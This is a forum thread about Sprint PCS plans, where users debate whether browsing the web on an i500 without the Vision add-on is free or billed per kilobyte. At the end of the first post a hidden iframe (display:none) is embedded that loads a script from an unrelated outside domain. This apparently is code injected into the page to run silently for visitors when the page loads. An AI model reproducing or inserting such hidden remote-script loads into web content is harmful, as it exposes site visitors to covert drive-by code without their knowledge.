+ Reply to Thread

Something for Nothing??

I use the i500 and have a $29.95/mth 300 minute PCS Free and Clear plan. I'm not paying anything additional for Vision, but I can still connect to the Web via Blazer. Am I getting something for free here?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think your web usage just counts as minutes off of your plan. You go over, you go over and pay your per minute overage rate. You're definitely not getting something for free. I could be wrong though and maybe they just tack on your web usage outside of your 29.95. Anyone know for sure? I get my vision for free

I don't have vision either, but browsing shows up as a per kilobyte charge on my bill.

Hmmmmm

What you all say makes sense, but . . .

I am not being billed on a per kb basis. The only extra charges that have appeared on my bill are for roaming and directory assistance. Nothing at all that points to the times I browse the Net.

danbe, is this still true for you? I have a business account and the lady told me I can browse the web for free w/o vision pack as long as I dont send pictures/download ringers, etc...

Often times, to get you "hooked" on new accounts you get Vision free for two months. That's probably what you're experiencing.
    Dale2 - The "P" in PDA is for Personal. There is no "best" PDA.
    Sprint CDMA Treo 650 since 11/05

Administrator
    Originally posted by dstrauss
    Often times, to get you "hooked" on new accounts you get Vision free for two months. That's probably what you're experiencing.
    i agree with dstrauss.. you are not getting anything for free. you better get the details on your plan before you have some charges come up later...

Well, as I said I called the business line, and the CSR said I can take off the $15 vision plan in my account and still have unlimited browsing of the web. What I cannot do is d/l ringers/send pictures, etc.

I didn't believe it either and asked to make sure I would not get a KB charge for browsing. She said I would not. It does sound strange, and I wanted to ask some other people here to also verify this with a CSR.

You're not necessarily getting something for nothing. If you're phone is on a business plan with other phones you might have a large enough bill that they include vision. That's how it was for me. I initially had this $400 per kb charge that I changed to the $15/mo vision plan, and when I called back to complain about the charges they said that vision was included on this plan because of the size of the account. I think it includes a few other perks as well, but haven't really followed up on them. We have about 5 or 6 phones on the business plan, an I300, a few 330's and my I5. Though I think I'm the only one that really takes advantage of vision. The others are technically challenged.